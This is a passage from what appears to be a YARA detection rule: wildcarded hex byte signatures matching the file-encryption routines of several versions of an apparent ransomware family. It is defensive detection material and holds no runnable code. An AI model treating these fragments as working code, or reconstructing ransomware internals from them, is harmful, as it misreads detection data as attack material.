?? 52 8D 85 ?? ?? ?? ?? 50 8B - 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50 - 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 E7 03 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ?? - 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 AF 03 00 00 - 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 97 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B - 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6A 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 2C 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 D9 02 00 00 - } - $v20_1_encrypt_file_2 = { - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ?? - 8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 81 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B - 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 41 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? - 0F 85 32 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F - 84 0B 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 FF 01 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ?? - ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CE 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F 84 73 01 00 00 C7 45 ?? ?? - ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 75 ?? 8B 45 ?? 3B 45 - ?? 77 1A 72 0B 8B 8D ?? ?? ?? ?? 3B 4D ?? 73 0D 8B 55 ?? 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 - ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B - } - $v20_1_encrypt_file_3 = { - 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 84 A2 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 96 00 00 00 C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 74 60 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF - D1 85 C0 74 31 8B 55 ?? 3B 55 ?? 75 29 8B 45 ?? 33 C9 03 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? - 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 - EB 05 E9 79 FE FF FF 83 7D ?? ?? 74 17 8B 55 ?? 3B 55 ?? 75 0F 8B 45 ?? 3B 45 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? - ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? - ?? ?? ?? FF D0 83 7D ?? ?? 74 0C 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 - 83 7D ?? ?? 75 22 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? - 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 74 37 8D 95 ?? ?? ?? ?? 52 8D 85 - ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 - ?? ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 5E 8B E5 5D C3 - } - $v30_1_encrypt_file_1 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 02 05 00 00 8B 45 ?? 83 38 ?? 74 - 09 8B 4D ?? 83 79 ?? ?? 75 08 8B 45 ?? E9 E9 04 00 00 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? - FF D0 89 45 ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B - 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6F 04 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 0F 85 90 03 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 F8 ?? 0F 84 70 03 - 00 00 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 50 03 00 00 8D 55 ?? 52 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? - ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 04 03 00 00 6A ?? 6A ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 E8 ?? - ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 CC 02 00 00 8B 4D ?? 3B 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 06 8B 45 ?? 89 - 45 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? - ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 84 73 01 00 00 8B 45 ?? 8B 48 ?? 83 E9 ?? 89 4D ?? 8B 55 ?? D1 E2 89 55 ?? 8B 45 ?? - } - $v30_1_encrypt_file_2 = { - 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 35 01 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 2B 4D ?? 39 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 09 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D - ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? - FF D0 85 C0 0F 84 94 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 88 00 00 00 8B 55 ?? 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? - ?? 74 73 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 - ?? ?? ?? ?? FF D0 85 C0 74 44 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF - D2 85 C0 74 21 8B 45 ?? 3B 45 ?? 75 19 8B 4D ?? 03 4D ?? 89 4D ?? 8B 55 ?? 03 55 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 83 7D - ?? ?? 74 06 83 7D ?? ?? 74 02 EB 0C 8B 45 ?? 3B 45 ?? 0F 85 FB FE FF FF 8B 4D ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B - 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 0F 85 02 01 00 00 C7 45 - ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 DB 00 00 00 6A ?? 8D - 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 AE 00 - } - $v30_1_encrypt_file_3 = { - 00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? 0F 85 9F 00 00 00 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 - ?? ?? ?? ?? FF D1 85 C0 74 7E 83 7D ?? ?? 75 78 8B 55 ?? 3B 55 ?? 74 1B 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? 8B 55 ?? 2B - 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 - 85 C0 74 34 83 7D ?? ?? 75 2E 6A ?? 8D 55 ?? 52 6A ?? 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 - C0 74 0D 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 07 C7 45 ?? ?? ?? - ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 71 83 7D ?? ?? 75 28 83 7D ?? ?? 75 22 68 ?? ?? - ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? EB 43 83 7D ?? ?? 74 36 83 7D ?? - ?? 74 30 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 - 74 07 C7 45 ?? ?? ?? ?? ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 45 ?? 8B E5 5D C3 - } - $v30_2_encrypt_file_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 BF 05 00 00 8B 45 ?? - 83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 94 05 00 00 - 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? - ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 1A 05 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B - 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50 - 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 0D 04 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ?? - 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 D5 03 00 00 - 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 BD 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B - 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 52 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 FF 02 00 00 - } - $v30_2_encrypt_file_2 = { - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ?? - 8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 A7 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B - 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 67 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? - 0F 85 58 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F - 84 31 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 25 02 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ?? - ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 F4 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? - ?? ?? 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F - 84 90 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? - ?? 89 95 ?? ?? ?? ?? 89 75 ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 77 1D 72 0E 8B 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 73 0D 8B 55 ?? - 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 - 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 - 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F - 84 B3 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 A7 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B - } - $v30_2_encrypt_file_3 = { - 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 71 6A ?? 8D 45 ?? 50 8B 4D ?? - 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 42 8B 55 ?? 3B 55 ?? 75 3A 8B 45 ?? 33 C9 03 - 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 33 C0 03 55 ?? 13 45 ?? 89 55 ?? 89 45 ?? 8B 4D ?? 51 E8 - ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 EB 05 - E9 5C FE FF FF 83 7D ?? ?? 74 17 8B 4D ?? 3B 4D ?? 75 0F 8B 55 ?? 3B 55 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B - 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? - ?? FF D2 83 7D ?? ?? 74 0C 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D - ?? ?? 75 22 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? - ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 74 37 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? - ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? - ?? ?? FF D1 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 45 ?? 5E 8B E5 5D C3 - } - $v30_3_encrypt_file_1 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 75 08 8B 45 ?? E9 48 04 00 00 83 7D ?? ?? 75 08 8B 45 ?? E9 3A 04 00 - 00 8B 45 ?? 83 78 ?? ?? 74 11 8B 4D ?? 83 39 ?? 74 09 8B 55 ?? 83 7A ?? ?? 75 08 8B 45 ?? E9 18 04 00 00 C7 45 ?? ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 6A ?? 8B 55 - ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B - 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 - 83 00 00 00 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 74 6B 6A ?? 8D 55 ?? 52 8B 45 ?? 8B 48 ?? - 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 39 8B 55 ?? 3B 15 ?? ?? ?? ?? 75 2E 8B 45 ?? - 8B 48 ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 50 ?? FF D2 85 C0 75 0E C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 9A 02 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? - 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 63 02 00 00 - 8B 55 ?? 3B 55 ?? 0F 87 57 02 00 00 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3F 02 00 00 6A ?? 6A - } - $v30_3_encrypt_file_2 = { - 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 0B 02 00 - 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 81 E1 ?? ?? ?? ?? 74 1C 6A ?? 6A ?? 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B - 88 ?? ?? ?? ?? FF D1 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? - FF D0 85 C0 0F 84 52 01 00 00 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 8B 02 50 8B 4D ?? 8B 51 ?? 52 8B 45 - ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 0A 01 00 00 8B 55 ?? 8B 42 ?? 83 E8 ?? 89 45 ?? 8B 4D ?? D1 E1 - 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CC 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 76 8B 55 ?? - 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5F 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 6A ?? 8B 45 ?? 50 6A ?? 8B 4D - ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 21 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? - ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 15 83 7D ?? ?? 74 0D 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? EB 0E EB 02 EB 0A 83 7D ?? - ?? 0F 84 54 FF FF FF 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? - } - $v30_3_encrypt_file_3 = { - ?? 8B 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 47 8B 4D ?? 81 E1 ?? - ?? ?? ?? 74 3C 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? - 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? - FF D0 EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D ?? ?? 75 20 68 ?? ?? ?? ?? 8B - 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 